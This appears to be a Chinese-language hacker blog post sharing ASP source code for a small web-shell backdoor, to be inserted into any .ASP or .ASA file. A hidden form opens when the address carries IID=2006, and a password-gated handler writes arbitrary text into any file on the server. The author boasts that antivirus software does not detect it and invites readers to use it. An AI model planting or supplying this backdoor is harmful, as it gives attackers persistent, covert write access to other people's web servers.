寫了一個ASP的後門函數

 

      我跟喜歡叫它瑞士軍刀，這段函數可以插入任何.ASP檔案和.ASA檔案。只要在地址中加上IID=2006,2006是我上大學的年份哦。

     個人認為asp的漏洞其實不多的，為什麼網路上說ASP漏洞多，本人認為是由於.ASP研究的人比任何一種WEB語言多的多，不是同一數量級上的概念，所以研究的人多了，也就暴露其問題了，這個沒什麼好說的是吧？

    這段還是其實是一段上傳函數，一般的Web Hacker都比較瞭解。中國管他加小馬，外國管他叫Back Door。其實一個道理了。

    代碼如下：

<%<br />DoorForm()<br />pwd()<br />function DoorForm()<br />dim iid<br />iid = request("iid")<br />if iid= 2006 then<br />response.write "<form method='post' action='?action=set&door=fine'>" &_<br />"<label></label>" &_<br />"<label>" &_<br />"<textarea name='Text' cols='50' rows='10' id='Text'>寫入內容" &_<br />"</textarea>" &_<br />"<br />" &_<br />"<br />" &_<br />"<input name='FileName' type='text' id='FileName' value='檔案名稱' size='52' maxlength='50' />" &_<br />"<br />" &_<br />"<br />" &_<br />"<input name='Pass' type='password' id='Pass' value='xxxxxxxxxxxxxxxxxxxxxx' size='52' maxlength='50' />" &_<br />"<br />" &_<br />"<br />" &_<br />"</label>" &_<br />"<label>" &_<br />"<input type='submit' name='Submit' value='儲存' />" &_<br />"</label>" &_<br />"</form>"<br />end if<br />end function<br />%><br /><%<br />function pwd()<br />dim door<br />door=request("pwd")<br />if door="fine" then<br />dim samllbad,pass<br />pass="fish"<br />if request("action")="set" then<br />if request("pass")=pass then<br />Text=request("Text")<br />FileName=request("FileName")<br />set fs=server.CreateObject("Scripting.FileSystemObject")<br />set file=fs.OpenTextFile(server.MapPath(FileName),8,True)<br />file.writeline Text<br />file.close<br />set file=nothing<br />set fs=nothing<br />response.write ("儲存成功！")<br />end if<br />else<br />response.write ("密碼錯誤！")<br />end if<br />end if<br />end function<br />%><br />

     還有我告訴大家，我不寫大馬，是因為等你看到的時候，這個已經是一堆垃圾代碼了。以上這個函數是不會被殺毒軟體查殺的，請放心使用。